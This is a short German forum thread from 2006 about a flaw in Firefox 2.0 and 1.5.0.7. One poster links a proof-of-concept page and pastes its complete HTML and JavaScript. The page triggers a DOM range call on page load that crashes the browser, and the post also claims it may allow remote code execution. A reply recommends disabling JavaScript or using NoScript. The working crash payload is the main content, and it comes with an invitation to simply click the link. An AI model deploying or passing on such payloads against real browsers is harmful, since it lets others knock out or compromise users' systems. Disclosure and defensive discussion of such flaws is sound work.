FLAW in Firefox 2.0 und 1.5.0.7
Eine Schwachstelle in den o.g. genannten Versionen des beliebten Firefoxbrowsers ermoeglicht Denial of Service und u.U. die Ausfuehrung von Remote Code.
Hallo liebe Gemeinde!
Einfach mal auf diesen Link klicken, Browser wird sofort abgeschossen.
PoC hier: http://werterxyz.altervista.org/Firefox2Range.htm
[31.10.2006, 03:14 am, von "xxxx"]
saludos
gnarff
Einfach mal auf diesen Link klicken, Browser wird sofort abgeschossen.
PoC hier: http://werterxyz.altervista.org/Firefox2Range.htm
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;
range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>
saludos
gnarff
Please also mark the comments that contributed to the solution of the article
Content-Key: 43533
Url: https://administrator.de/contentid/43533
Printed on: April 20, 2024 at 03:04 o'clock
2 Comments
Latest comment
Hallo,
nein, stürzt nicht ab. Javascript habe ich nämlich schon lange nicht mehr aktiviert und das kann man nur jedem raten. Beziehungsweise um es differenzierter abzuschalten:
http://www.erweiterungen.de/detail/NoScript/
Gruß,
Tim
nein, stürzt nicht ab. Javascript habe ich nämlich schon lange nicht mehr aktiviert und das kann man nur jedem raten. Beziehungsweise um es differenzierter abzuschalten:
http://www.erweiterungen.de/detail/NoScript/
Gruß,
Tim